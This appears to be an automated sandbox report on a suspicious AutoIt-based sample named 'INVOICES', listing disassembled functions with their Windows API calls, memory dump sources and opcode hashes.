                                                                                                                                  • Instruction ID: 7d82419d29be1b121bcd49ae129c0f1a4014aea26d80dec2330ec3a38952b2cd
                                                                                                                                  • Opcode Fuzzy Hash: 6fc51e82a181cfce7101defdacd3c485727fcc5efa54aabc122612f2567eb048
                                                                                                                                  • Instruction Fuzzy Hash: 39014FB1240208EFDB115FAADC48D6B7BACEF457557544629FC09C2120DA358D10CB61
                                                                                                                                  Function 007952EB Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00795307
                                                                                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00795315
                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 0079531D
                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00795327
                                                                                                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00795363
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2833360925-0
                                                                                                                                  • Opcode ID: a93a73b7008b3a0f9503c5fd2f41f4093e222a174fce4c1b02e7f3026423ab4e
                                                                                                                                  • Instruction ID: 72d7d43d8f403536e5cabd06abd3dcef93662cc4d069b197992423caf63a0677
                                                                                                                                  • Opcode Fuzzy Hash: a93a73b7008b3a0f9503c5fd2f41f4093e222a174fce4c1b02e7f3026423ab4e
                                                                                                                                  • Instruction Fuzzy Hash: 04016D71C02A2DDBCF019FA9EC8DAEDBB78FB08711F05465AE841F2140DB78555087A5
                                                                                                                                  Function 00787432 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CLSIDFromProgID.COMBASE ref: 0078744F
                                                                                                                                  • ProgIDFromCLSID.COMBASE(?,00000000), ref: 0078746A
                                                                                                                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0078736C,80070057,?,?), ref: 00787478
                                                                                                                                  • CoTaskMemFree.COMBASE(00000000), ref: 00787488
                                                                                                                                  • CLSIDFromString.COMBASE(?,?), ref: 00787494
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3897988419-0
                                                                                                                                  • Opcode ID: b96576546373840e6fc57cc39790caa4a868b0e69d244b6b2ca4231a0796960d
                                                                                                                                  • Instruction ID: 8d4bcb06ac8fe4d42184975642bc4474e3d3c65e65b622ba0c550a7eaa83a5ca
                                                                                                                                  • Opcode Fuzzy Hash: b96576546373840e6fc57cc39790caa4a868b0e69d244b6b2ca4231a0796960d
                                                                                                                                  • Instruction Fuzzy Hash: F0017172605204BBDB146F64DC44FAA7FADEB44B62F248124F909D3220D739DD40DBA0
                                                                                                                                  Function 007883D1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007883E8
                                                                                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007883F2
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00788401
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00788408
                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0078841E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 47921759-0
                                                                                                                                  • Opcode ID: 9f3022fad60866f5459e2363d0935be75f25ac91c6ea98e9051c1dc4907cee98
                                                                                                                                  • Instruction ID: d866e63c02a687fd488129139e2126d505ece48e11d001302a5b22d965235d2c
                                                                                                                                  • Opcode Fuzzy Hash: 9f3022fad60866f5459e2363d0935be75f25ac91c6ea98e9051c1dc4907cee98
                                                                                                                                  • Instruction Fuzzy Hash: B2F0AF71244209BFEB102FA8DC88F6B3BACEF89B54B404525F909C3160CB689C45DB61
                                                                                                                                  Function 00788432 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00788449
                                                                                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00788453
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00788462
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00788469
                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0078847F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 47921759-0
                                                                                                                                  • Opcode ID: 9bc94537ddc681713f3bea44ef11ed2ff450f224db87728ce0b880159943a6eb
                                                                                                                                  • Instruction ID: 04562499467c1c5c8677d8b672df833c63d7e39bb1bde89f9a91d5ed07ef946e
                                                                                                                                  • Opcode Fuzzy Hash: 9bc94537ddc681713f3bea44ef11ed2ff450f224db87728ce0b880159943a6eb
                                                                                                                                  • Instruction Fuzzy Hash: A6F0C271240309BFEB512FA8EC88F673FACEF49B54B444625F909C3160CB689C00DB61
                                                                                                                                  Function 0078C4A5 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0078C4B9
                                                                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 0078C4D0
                                                                                                                                  • MessageBeep.USER32(00000000), ref: 0078C4E8
                                                                                                                                  • KillTimer.USER32(?,0000040A), ref: 0078C504
                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 0078C51E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3741023627-0
                                                                                                                                  • Opcode ID: 16c36a0cece15856ce06f8c4c74fc6f44249a7b3b70a49c582d53ed9ffe4cdf0
                                                                                                                                  • Instruction ID: 16f6d42760cf525c80df9447f2bf68e938dd640f92e0989d1e04356571234273
                                                                                                                                  • Opcode Fuzzy Hash: 16c36a0cece15856ce06f8c4c74fc6f44249a7b3b70a49c582d53ed9ffe4cdf0
                                                                                                                                  • Instruction Fuzzy Hash: 8B018B30540704A7EB316B24DD4EFA677B8FF00B09F004669F546E10E1DBF869548B54
                                                                                                                                  Function 007313B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EndPath.GDI32(?), ref: 007313BF
                                                                                                                                  • StrokeAndFillPath.GDI32(?,?,0076BA08,00000000,?), ref: 007313DB
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 007313EE
                                                                                                                                  • DeleteObject.GDI32 ref: 00731401
                                                                                                                                  • StrokePath.GDI32(?), ref: 0073141C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2625713937-0
                                                                                                                                  • Opcode ID: ed4ea2b2a9a28b58fe3f825de764b2b5d47671bbcaef527ad3b5e482381f92cf
                                                                                                                                  • Instruction ID: 6f54fcab0126244945b0380c44814a99acdbf3362245b94f2f88f109e3094f5d
                                                                                                                                  • Opcode Fuzzy Hash: ed4ea2b2a9a28b58fe3f825de764b2b5d47671bbcaef527ad3b5e482381f92cf
                                                                                                                                  • Instruction Fuzzy Hash: 61F0FF31004B48EBEB116F2AEC4CB683FA4AB01766F58C325F529490F2C73D8995DF58
                                                                                                                                  Function 00788C54 Relevance: 7.5, APIs: 5, Instructions: 23memorysynchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00788C5F
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00788C74
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00788C7C
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00788C85
                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00788C8C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandleHeap$FreeObjectProcessSingleWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3751786701-0
                                                                                                                                  • Opcode ID: 40a93ff8716eda121a04bad0b3c2d068f2d2af65802fd1c4417342c17ab7a50b
                                                                                                                                  • Instruction ID: c280ecd3fcea8e66ac0927720c95ca50bc5069dae0013c85245c4d2f8d5badce
                                                                                                                                  • Opcode Fuzzy Hash: 40a93ff8716eda121a04bad0b3c2d068f2d2af65802fd1c4417342c17ab7a50b
                                                                                                                                  • Instruction Fuzzy Hash: F5E05276104509FBDA011FE5EC0CE5ABFA9FB89B62B548731F219C1470CB3A9861DB58
                                                                                                                                  Function 00742E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00750F36: std::exception::exception.LIBCMT ref: 00750F6C
                                                                                                                                    • Part of subcall function 00750F36: __CxxThrowException@8.LIBCMT ref: 00750F81
                                                                                                                                    • Part of subcall function 00737F41: _memmove.LIBCMT ref: 00737F82
                                                                                                                                    • Part of subcall function 00737BB1: _memmove.LIBCMT ref: 00737C0B
                                                                                                                                  • __swprintf.LIBCMT ref: 0074302D
                                                                                                                                  Strings
                                                                                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00742EC6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                  • API String ID: 1943609520-557222456
                                                                                                                                  • Opcode ID: 5e778facd6c95a8f002eef63fd6609670b13e0daa68159ad5069099be0b4c4e9
                                                                                                                                  • Instruction ID: 9aa3fef56f946d100711957743ee5654d023ca092c5e34da12c9858084fb8370
                                                                                                                                  • Opcode Fuzzy Hash: 5e778facd6c95a8f002eef63fd6609670b13e0daa68159ad5069099be0b4c4e9
                                                                                                                                  • Instruction Fuzzy Hash: 6C917271108605DFDB28EF24C899C6EB7B5EF85740F04491DF849972A2DB78EE44CB92
                                                                                                                                  Function 0079B9C7 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 007348AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007348A1,?,?,007337C0,?), ref: 007348CE
                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 0079BA47
                                                                                                                                  • CoCreateInstance.COMBASE(007C2D6C,00000000,00000001,007C2BDC,?), ref: 0079BA60
                                                                                                                                  • CoUninitialize.COMBASE ref: 0079BA7D
                                                                                                                                    • Part of subcall function 00739997: __itow.LIBCMT ref: 007399C2
                                                                                                                                    • Part of subcall function 00739997: __swprintf.LIBCMT ref: 00739A0C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                                  • String ID: .lnk
                                                                                                                                  • API String ID: 2126378814-24824748
                                                                                                                                  • Opcode ID: 2df9235f5110931ac70fe97c839036d53af97c2641a18f5024b3fd64063213c9
                                                                                                                                  • Instruction ID: 7dd8b67aaadabd2e81e9766c3a2b9e833eedbe5f048d7f7d9e2f9f0d792b05f4
                                                                                                                                  • Opcode Fuzzy Hash: 2df9235f5110931ac70fe97c839036d53af97c2641a18f5024b3fd64063213c9
                                                                                                                                  • Instruction Fuzzy Hash: F5A168756043059FCB10DF14D988E5ABBE5FF89314F048988F8999B3A2CB35EC45CB91
                                                                                                                                  Function 0078B5B5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 0078B780
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContainedObject
                                                                                                                                  • String ID: AutoIt3GUI$Container$%|
                                                                                                                                  • API String ID: 3565006973-2882729281
                                                                                                                                  • Opcode ID: 6dd75b5227978b15e30f93c686da8ba3fe37c74df2505c3d608d57ff4233bcd3
                                                                                                                                  • Instruction ID: d6d00767464ae4a31ac429f69b300ed234c45cd49de55277064b75ad77eedf14
                                                                                                                                  • Opcode Fuzzy Hash: 6dd75b5227978b15e30f93c686da8ba3fe37c74df2505c3d608d57ff4233bcd3
                                                                                                                                  • Instruction Fuzzy Hash: 2C912A70640601DFDB24EF64C894B66BBF8FF48710F14856DE949CB691EBB5E841CB90
                                                                                                                                  Function 0075518D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 0075521D
                                                                                                                                    • Part of subcall function 00760270: __87except.LIBCMT ref: 007602AB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorHandling__87except__start
                                                                                                                                  • String ID: pow
                                                                                                                                  • API String ID: 2905807303-2276729525
                                                                                                                                  • Opcode ID: 9ed0783491f517bf49eac80baf9f7779fcb506daa39c849a5e3ba8445811d91a
                                                                                                                                  • Instruction ID: e58765e6c8f3f827e130cfbf33f81e41d9e23b096d928fe3fd477f6cea61fced
                                                                                                                                  • Opcode Fuzzy Hash: 9ed0783491f517bf49eac80baf9f7779fcb506daa39c849a5e3ba8445811d91a
                                                                                                                                  • Instruction Fuzzy Hash: 95515B60A0CA01D7DB216714C9653AF2B94BB00752F24895CEC96462A5EFAC8CCC9B86
                                                                                                                                  Function 0075017B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: #$+
                                                                                                                                  • API String ID: 0-2552117581
                                                                                                                                  • Opcode ID: 9b9af75d34c1a9c246e8ca6e694936c9797cad7c3d9f51ab47d0c683d6a4b727
                                                                                                                                  • Instruction ID: fc15299cc1614d20cfdc5b7c6b10b6ceffafa8557cf3f3acc9be9fb343c9b1ba
                                                                                                                                  • Opcode Fuzzy Hash: 9b9af75d34c1a9c246e8ca6e694936c9797cad7c3d9f51ab47d0c683d6a4b727
                                                                                                                                  • Instruction Fuzzy Hash: A9511EB554424ADFDF25AF28C489AFABBB0FF25310F144059EC919B2A1C77C9C46CBA0
                                                                                                                                  Function 00743297 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
